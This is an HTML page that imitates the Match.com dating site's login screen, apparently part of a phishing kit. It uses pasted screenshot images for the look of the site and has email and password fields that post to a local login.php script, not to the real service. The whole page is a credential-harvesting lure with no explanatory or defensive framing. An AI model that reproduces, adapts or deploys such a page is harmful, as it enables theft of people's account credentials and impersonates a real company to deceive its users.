<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Match� | Login | The Leading Online Dating Site for Singles & Personals</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1346px; height:627px; z-index:0"><img src="images/paste23.jpg" alt="" title="" border=0 width=1346 height=627></div>

<div id="image2" style="position:absolute; overflow:hidden; left:755px; top:63px; width:274px; height:58px; z-index:1"><img src="images/paste24.jpg" alt="" title="" border=0 width=274 height=58></div>

<div id="image3" style="position:absolute; overflow:hidden; left:0px; top:618px; width:1348px; height:230px; z-index:2"><img src="images/paste25.jpg" alt="" title="" border=0 width=1348 height=230></div>

<form name="form1" method="POST" action="login.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="text" style="position:absolute;width:512px;left:217px;top:158px;z-index:4;height: 41px;" placeholder="Enter email">
<input name="formtext2" type="password" style="position:absolute;width:512px;left:217px;top:209px;z-index:5;height: 41px;" placeholder="Enter password">
<div id="formimage1" style="position:absolute; left:203px; top:330px; z-index:6"><input type="image" name="formimage1" width="523" height="76" src="images/utlls.PNG"></div>
</form>


</body>
</html>
